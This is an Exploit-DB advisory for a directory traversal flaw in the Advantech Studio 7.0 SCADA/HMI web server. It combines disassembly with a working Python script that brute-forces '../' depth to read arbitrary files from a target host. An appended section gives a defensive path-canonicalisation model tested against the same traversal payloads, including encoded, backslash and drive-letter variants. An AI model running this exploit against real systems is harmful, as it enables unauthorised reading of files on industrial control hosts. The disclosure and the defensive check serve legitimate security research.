Advantech Studio 7.0 - SCADA/HMI Directory Traversal

EDB-ID: 23132
Author: Nin3
Type: webapps
Platform: Windows
Date: 2012-12-04


# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI ships a built-in web server, NTWebServer.exe.
It is a standalone executable that runs alongside every project and provides a
web-based management interface, with the help of an ActiveX control.

The flaw is a complete lack of validation of the path of the requested file.
The caller at .text:00402A4A hands the request path, unchanged, to
sub_401A90:

.text:00402A4A                 push    0               ; dwFlagsAndAttributes
.text:00402A4C                 push    3               ; dwCreationDisposition
.text:00402A4E                 push    3               ; dwShareMode
.text:00402A50                 push    80000000h       ; dwDesiredAccess
.text:00402A55                 mov     edx, [ebp+lpFileName]
.text:00402A58                 push    edx             ; lpFileName
.text:00402A59                 lea     ecx, [ebp+var_1C]
.text:00402A5C                 call    sub_401A90


sub_401A90 is a thin wrapper that forwards its arguments to CreateFileW with no
canonicalisation and no check that the resolved path lies under the web root.
Note the arguments pushed by the caller: 80000000h is GENERIC_READ and a
creation disposition of 3 is OPEN_EXISTING, so "../" sequences in the URL give
an arbitrary file read (not write) of anything the NTWebServer.exe process can
open.

.text:00401A97                 push    0               ; hTemplateFile
.text:00401A99                 mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C                 push    eax             ; dwFlagsAndAttributes
.text:00401A9D                 mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0                 push    ecx             ; dwCreationDisposition
.text:00401AA1                 push    0               ; lpSecurityAttributes
.text:00401AA3                 mov     edx, [ebp+dwShareMode]
.text:00401AA6                 push    edx             ; dwShareMode
.text:00401AA7                 mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA                 push    eax             ; dwDesiredAccess
.text:00401AAB                 mov     ecx, [ebp+lpFileName]
.text:00401AAE                 push    ecx             ; lpFileName
.text:00401AAF                 call    ds:CreateFileW

'''
import argparse
import http.client  # Python 3 name for the httplib module used by the original script

# Maximum number of "../" segments to try before giving up.
MAX_NESTED_DIRECTORY = 32


def MakePath(f, count):
    """Build the request target: count copies of "../" followed by the target
    file, e.g. count=2, f="windows/system.ini" -> "/../../windows/system.ini".
    The leading "/" makes a valid HTTP request-target; the original script
    sent a relative one."""
    return "/" + "../" * count + f


def main():
    parser = argparse.ArgumentParser(
        description="Advantech Studio 7.0 NTWebServer.exe directory traversal",
        epilog="example: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini")
    parser.add_argument('-d', required=True, help='target host')
    parser.add_argument('-p', required=True, type=int, help='target port')
    parser.add_argument('-f', required=True,
                        help='file to read, relative to the drive root (e.g. windows/system.ini)')
    args = parser.parse_args()

    # One connection is reused; http.client reconnects automatically if the
    # server closes it between requests.
    httpConn = http.client.HTTPConnection(args.d, args.p, timeout=10)
    for i in range(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content = resp.read()
        if resp.status == 200:
            print('Found ' + temp)
            print('------------------------------------------')
            print(content.decode('latin-1'))
            print('---------------------------------------EOF')
            break
        # Report 404/403/500 etc. and try one level deeper. (The original
        # treated every non-404 status as a hit.)
        print('HTTP %d for %s' % (resp.status, temp))
    else:
        print('[!] Gave up after %d levels of traversal' % MAX_NESTED_DIRECTORY)


if __name__ == "__main__":
    main()
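
The advisory shows that sub_401A90 passes the URL path to CreateFileW with no check at all. The following is an added example, not code from the advisory or from Advantech's product: a Python model of the path check the server should have performed before opening the file, run against the same "../" payloads the exploit above generates plus the variants a practitioner would also test (backslashes, percent-encoding, double encoding, drive letters, UNC paths, embedded NUL). The web root and the sample request paths are constructed for illustration; the real install path is not stated in the advisory.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical web root (constructed; the advisory does not give the real one).
WEB_ROOT = "C:/Program Files/Advantech Studio/Web"


def canonicalize(request_path):
    """Normalise a URL path into a root-relative file path.

    Returns None when the request tries to escape the document root
    (via '..', an absolute/UNC/drive path, or an embedded NUL)."""
    # Decode percent-encoding twice so both %2e%2e and %252e%252e become '..'.
    p = unquote(unquote(request_path))
    # Win32 accepts '\' as a separator, so treat it as '/' before looking at segments.
    p = p.replace("\\", "/")
    # CreateFileW would truncate at a NUL, hiding anything after it from a naive check.
    if "\x00" in p:
        return None
    # Absolute targets: UNC (//server/share) or a drive letter (C:...).
    if p.startswith("//") or (len(p) >= 2 and p[1] == ":"):
        return None
    # Walk the segments, refusing to climb above the root at any point.
    # (posixpath.normpath alone is not enough: normpath("/../x") == "/x".)
    depth = 0
    for seg in p.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return None
        elif seg not in ("", "."):
            depth += 1
    # Safe to collapse '.' and duplicate slashes now; drop the synthetic leading '/'.
    return posixpath.normpath("/" + p.lstrip("/")).lstrip("/")


def resolve(request_path, web_root=WEB_ROOT):
    """Map a request path onto the filesystem, or return None if it escapes web_root.
    This is the step missing between the HTTP parser and CreateFileW."""
    rel = canonicalize(request_path)
    if rel is None:
        return None
    root = web_root.rstrip("/")
    full = posixpath.join(root, rel) if rel else root
    # Final containment check on the joined path (belt and braces).
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def traversal_payload(target, count):
    """Same construction as the exploit's MakePath(): count x '../' then target."""
    return "../" * count + target


if __name__ == "__main__":
    # Constructed sample requests: legitimate ones resolve, the payloads do not.
    for req in ["index.html", "/img/../index.html",
                traversal_payload("windows/system.ini", 3),
                "..\\..\\windows\\system.ini",
                "%2e%2e/%2e%2e/windows/system.ini",
                "C:/windows/system.ini"]:
        print("%-40r -> %r" % (req, resolve(req)))
```

The segment walk is what actually stops the traversal; the prefix comparison at the end only catches mistakes in the steps before it. This model deliberately stays string-only so it runs anywhere, which means it does not cover Windows-specific aliases of a file (8.3 short names, trailing dots and spaces, `::$DATA` streams, symbolic links and junctions). A real fix on Windows should additionally open the file and compare the final path returned by GetFinalPathNameByHandleW against the web root.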